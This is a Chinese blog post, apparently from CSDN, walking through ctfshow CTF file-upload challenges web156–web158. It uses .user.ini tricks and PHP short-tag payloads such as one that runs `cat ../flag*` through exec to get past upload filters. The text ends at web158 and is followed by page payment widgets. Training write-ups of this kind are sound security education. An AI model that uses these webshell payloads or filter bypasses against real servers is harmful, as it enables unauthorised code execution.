[ctfshow]web入门——文件上传(web156-web163)

本文详细介绍了CTF比赛中的一个系列问题,涉及Web文件上传漏洞利用,从web156到web163,包括利用.user.ini文件、日志包含、远程文件包含和session条件竞争等技巧,分析了各种过滤策略并提出绕过方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[ctfshow]web入门——文件上传(web156-web163)

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_优快云博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!


web156

上传.user.ini

上传口
在这里插入图片描述
试了试upload界面有一个默认文件,可以用上传.user.ini的方法
在这里插入图片描述
后台应该是屏蔽了很多字符串(php,eval,post等等),甚至连正常图片都传不上去
试了一下php短标签<? ?>还可以用
先找一下flag在哪
在这里插入图片描述
在这里插入图片描述
然后读flag的内容

<? exec("cat ../flag* > 2.txt");?>

访问/upload/,然后再访问/upload/2.txt,看到flag
在这里插入图片描述


web157

payload同上题,屏蔽了;

<? exec("cat ../flag* > 2.txt")?>

在这里插入图片描述


web158

payload同上题

<? exec("cat ../flag* > 2.txt")
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值